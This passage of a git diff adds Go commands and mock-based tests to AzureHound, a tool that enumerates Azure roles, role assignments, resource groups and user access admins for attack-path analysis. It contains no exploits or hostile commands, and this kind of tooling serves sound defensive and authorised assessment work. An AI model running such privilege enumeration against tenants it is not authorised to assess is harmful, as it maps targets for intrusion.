+// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listResourceGroupRoleAssignmentsCmd) +} + +var listResourceGroupRoleAssignmentsCmd = &cobra.Command{ + Use: "resource-group-role-assignments", + Long: "Lists Resource Group Role Assignments", + Run: listResourceGroupRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listResourceGroupRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource group role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + resourceGroups := listResourceGroups(ctx, azClient, subscriptions) + stream := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listResourceGroupRoleAssignments(ctx context.Context, client client.AzureClient, resourceGroups <-chan interface{}) <-chan azureWrapper[models.ResourceGroupRoleAssignments] { + var ( + out = make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), resourceGroups) { + if resourceGroup, ok := result.(AzureWrapper).Data.(models.ResourceGroup); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating resource group role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, resourceGroup.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + resourceGroupRoleAssignments = models.ResourceGroupRoleAssignments{ + ResourceGroupId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this resourceGroup", "resourceGroupId", id) + } else { + resourceGroupRoleAssignment := models.ResourceGroupRoleAssignment{ + ResourceGroupId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found resourceGroup role assignment", "resourceGroupRoleAssignment", resourceGroupRoleAssignment) + count++ + resourceGroupRoleAssignments.RoleAssignments = append(resourceGroupRoleAssignments.RoleAssignments, resourceGroupRoleAssignment) + } + } + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZResourceGroupRoleAssignment, resourceGroupRoleAssignments)); !ok { + return + } + log.V(1).Info("finished listing resourceGroup role assignments", "resourceGroupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all resource group role assignments") + }() + + return out +} diff --git a/cmd/list-resource-group-role-assignments_test.go b/cmd/list-resource-group-role-assignments_test.go new file mode 100644 index 0000000..8b1ac8d --- /dev/null +++ b/cmd/list-resource-group-role-assignments_test.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockManagementGroupsChannel := make(chan interface{}) + mockManagementGroupRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockManagementGroupRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupRoleAssignmentChannel2).Times(1) + channel := listManagementGroupRoleAssignments(ctx, mockClient, mockManagementGroupsChannel) + + go func() { + defer close(mockManagementGroupsChannel) + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + }() + go func() { + defer close(mockManagementGroupRoleAssignmentChannel) + mockManagementGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + } + mockManagementGroupRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + }() + go func() { + defer close(mockManagementGroupRoleAssignmentChannel2) + mockManagementGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + mockManagementGroupRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } +} diff --git a/cmd/list-resource-group-user-access-admins.go b/cmd/list-resource-group-user-access-admins.go new file mode 100644 index 0000000..0762c77 --- /dev/null +++ b/cmd/list-resource-group-user-access-admins.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listResourceGroupUserAccessAdminsCmd) +} + +var listResourceGroupUserAccessAdminsCmd = &cobra.Command{ + Use: "resource-group-user-access-admins", + Long: "Lists Azure Resource Group User Access Admins", + Run: listResourceGroupUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listResourceGroupUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource group user access admins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + resourceGroups := listResourceGroups(ctx, azClient, subscriptions) + roleAssignments := listResourceGroupRoleAssignments(ctx, azClient, resourceGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listResourceGroupUserAccessAdmins(ctx, roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listResourceGroupUserAccessAdmins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ResourceGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ResourceGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, rgRoleAssignmentFilter(constants.OwnerRoleID)) + uaas := internal.Map(filteredAssignments, func(ra models.ResourceGroupRoleAssignment) models.ResourceGroupUserAccessAdmin { + return models.ResourceGroupUserAccessAdmin{ + UserAccessAdmin: ra.RoleAssignment, + ResourceGroupId: ra.ResourceGroupId, + } + }) + return NewAzureWrapper(enums.KindAZResourceGroupUserAccessAdmin, models.ResourceGroupUserAccessAdmins{ + ResourceGroupId: ra.Data.ResourceGroupId, + UserAccessAdmins: uaas, + }) + }) +} diff --git a/cmd/list-resource-group-user-access-admins_test.go b/cmd/list-resource-group-user-access-admins_test.go new file mode 100644 index 0000000..8ba792c --- /dev/null +++ b/cmd/list-resource-group-user-access-admins_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListResourceGroupUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listResourceGroupUserAccessAdmins(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZResourceGroupRoleAssignment, + models.ResourceGroupRoleAssignments{ + ResourceGroupId: "foo", + RoleAssignments: []models.ResourceGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-resource-groups.go b/cmd/list-resource-groups.go new file mode 100644 index 0000000..586279c --- /dev/null +++ b/cmd/list-resource-groups.go @@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listResourceGroupsCmd) +} + +var listResourceGroupsCmd = &cobra.Command{ + Use: "resource-groups", + Long: "Lists Azure Resource Groups", + Run: listResourceGroupsCmdImpl, + SilenceUsage: true, +} + +func listResourceGroupsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource groups...") + start := time.Now() + stream := listResourceGroups(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listResourceGroups(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating resource groups", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureResourceGroups(ctx, id, query.RMParams{Top: 1000}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing resource groups for this subscription", "subscriptionId", id) + } else { + resourceGroup := models.ResourceGroup{ + ResourceGroup: item.Ok, + SubscriptionId: "/subscriptions/" + id, + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found resource group", "resourceGroup", resourceGroup) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZResourceGroup, + Data: resourceGroup, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing resource groups", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all resource groups") + }() + + return out +} diff --git a/cmd/list-resource-groups_test.go b/cmd/list-resource-groups_test.go new file mode 100644 index 0000000..19009a6 --- /dev/null +++ b/cmd/list-resource-groups_test.go @@ -0,0 +1,109 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListResourceGroups(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockSubscriptionsChannel := make(chan interface{}) + mockResourceGroupChannel := make(chan client.AzureResult[azure.ResourceGroup]) + mockResourceGroupChannel2 := make(chan client.AzureResult[azure.ResourceGroup]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureResourceGroups(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupChannel).Times(1) + mockClient.EXPECT().ListAzureResourceGroups(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockResourceGroupChannel2).Times(1) + channel := listResourceGroups(ctx, mockClient, mockSubscriptionsChannel) + + go func() { + defer close(mockSubscriptionsChannel) + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + }() + go func() { + defer close(mockResourceGroupChannel) + mockResourceGroupChannel <- client.AzureResult[azure.ResourceGroup]{ + Ok: azure.ResourceGroup{}, + } + mockResourceGroupChannel <- client.AzureResult[azure.ResourceGroup]{ + Ok: azure.ResourceGroup{}, + } + }() + go func() { + defer close(mockResourceGroupChannel2) + mockResourceGroupChannel2 <- client.AzureResult[azure.ResourceGroup]{ + Ok: azure.ResourceGroup{}, + } + mockResourceGroupChannel2 <- client.AzureResult[azure.ResourceGroup]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.ResourceGroup); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ResourceGroup{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-role-assignments.go b/cmd/list-role-assignments.go new file mode 100644 index 0000000..d9fa24b --- /dev/null +++ b/cmd/list-role-assignments.go @@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listRoleAssignmentsCmd) +} + +var listRoleAssignmentsCmd = &cobra.Command{ + Use: "role-assignments", + Long: "Lists Azure Active Directory Role Assignments", + Run: listRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory role assignments...") + start := time.Now() + roles := listRoles(ctx, azClient) + stream := listRoleAssignments(ctx, azClient, roles) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listRoleAssignments(ctx context.Context, client client.AzureClient, roles <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), roles) { + if role, ok := result.(AzureWrapper).Data.(models.Role); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, role.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + roleAssignments = models.RoleAssignments{ + RoleDefinitionId: id, + TenantId: client.TenantInfo().TenantId, + } + count = 0 + filter = fmt.Sprintf("roleDefinitionId eq '%s'", id) + ) + // We expand directoryScope in order to obtain the appId from app specific scoped role assignments + for item := range client.ListAzureADRoleAssignments(ctx, query.GraphParams{Filter: filter, Expand: "directoryScope"}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this role", "roleDefinitionId", id) + } else { + log.V(2).Info("found role assignment", "roleAssignments", item) + count++ + // To ensure proper linking to AZApp nodes we want to supply the AppId instead when role assignments are app specific scoped + if item.Ok.DirectoryScopeId != "/" { + item.Ok.DirectoryScopeId = fmt.Sprintf("/%s", item.Ok.DirectoryScope.AppId) + } + roleAssignments.RoleAssignments = append(roleAssignments.RoleAssignments, item.Ok) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZRoleAssignment, + Data: roleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing role assignments", "roleDefinitionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all role assignments") + }() + + return out +} diff --git a/cmd/list-role-assignments_test.go b/cmd/list-role-assignments_test.go new file mode 100644 index 0000000..2dd8195 --- /dev/null +++ b/cmd/list-role-assignments_test.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "testing" + + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() +} diff --git a/cmd/list-roles.go b/cmd/list-roles.go new file mode 100644 index 0000000..7a377c6 --- /dev/null +++ b/cmd/list-roles.go @@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listRolesCmd) +} + +var listRolesCmd = &cobra.Command{ + Use: "roles", + Long: "Lists Azure Active Directory Roles", + Run: listRolesCmdImpl, + SilenceUsage: true, +} + +func listRolesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory roles...") + start := time.Now() + stream := listRoles(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listRoles(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADRoles(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing roles") + return + } else { + log.V(2).Info("found role", "role", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZRole, + Data: models.Role{ + Role: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + }); !ok { + return + } + } + } + log.Info("finished listing all roles", "count", count) + }() + + return out +} diff --git a/cmd/list-roles_test.go b/cmd/list-roles_test.go new file mode 100644 index 0000000..09cdcb5 --- /dev/null +++ b/cmd/list-roles_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListRoles(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Role]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADRoles(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Role]{ + Ok: azure.Role{}, + } + mockChannel <- client.AzureResult[azure.Role]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Role]{ + Ok: azure.Role{}, + } + }() + + channel := listRoles(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-root.go b/cmd/list-root.go new file mode 100644 index 0000000..fb0d05d --- /dev/null +++ b/cmd/list-root.go @@ -0,0 +1,70 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + config.Init(listRootCmd, append(config.AzureConfig, config.OutputFile)) + rootCmd.AddCommand(listRootCmd) +} + +var listRootCmd = &cobra.Command{ + Use: "list", + Short: "Lists Azure Objects", + Run: listCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func listCmdImpl(cmd 